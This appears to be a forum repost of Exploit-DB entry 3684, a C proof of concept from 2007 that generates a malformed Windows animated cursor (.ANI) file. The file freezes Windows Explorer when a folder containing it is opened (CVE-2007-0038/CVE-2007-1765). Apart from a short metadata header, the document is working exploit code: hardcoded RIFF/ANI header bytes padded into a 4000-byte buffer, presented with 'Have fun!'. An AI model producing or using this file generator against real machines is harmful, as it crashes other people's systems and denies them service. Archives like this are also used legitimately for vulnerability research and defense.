- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3684
- Проверка EDB
-
- Пройдено
- Автор
- MARSU
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-0038 cve-2007-1765
- Дата публикации
- 2007-04-08
C:
/****************************************************************************
* MS Windows Explorer Unspecified .ANI File DoS *
* *
* *
* Another .Ani bug that freezes Explorer if you open a folder that contains *
* a crafted file. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded by Marsu <[email protected]> *
****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
unsigned char Ani_headers[] =
"\x52\x49\x46\x46\x08\x4d\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
"\x0a\x00\x00\x00\x01\x00\x00\x00\x72\x61\x74\x65\x18\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x4c\x49\x53\x54\xa8\x4c\x00\x00"
"\x66\x72\x61\x6d\x69\x63\x6f\x6e\xbe\x0c\x00\x00\x00\x00\x02\x00"
"\x01\x00\x20\x20\x00\x57\x57\x57\x57\x00\xa8\x0c\x00\x00\x16\x00"
"\x00\x00\x03" //Change this last char to avoid crash
;
int main(int argc, char* argv[])
{
FILE* anifile;
char evilbuff[4000];
printf("[+] MS Windows Explorer Unspecified .ANI File DoS\n");
printf("[+] Coded by Marsu <[email protected]>\n");
if (argc!=2) {
printf("[+] Usage: %s <file.ani>\n",argv[0]);
return 0;
}
memset(evilbuff,'A',4000);
memcpy(evilbuff,Ani_headers,sizeof(Ani_headers)-1);
if ((anifile=fopen(argv[1],"wb"))==0) {
printf("[-] Unable to access file.\n");
return 0;
}
fwrite( evilbuff, 1, 4000, anifile );
fclose(anifile);
printf("[+] Done. Have fun!\n");
return 0;
}
// milw0rm.com [2007-04-08]- Источник
- www.exploit-db.com
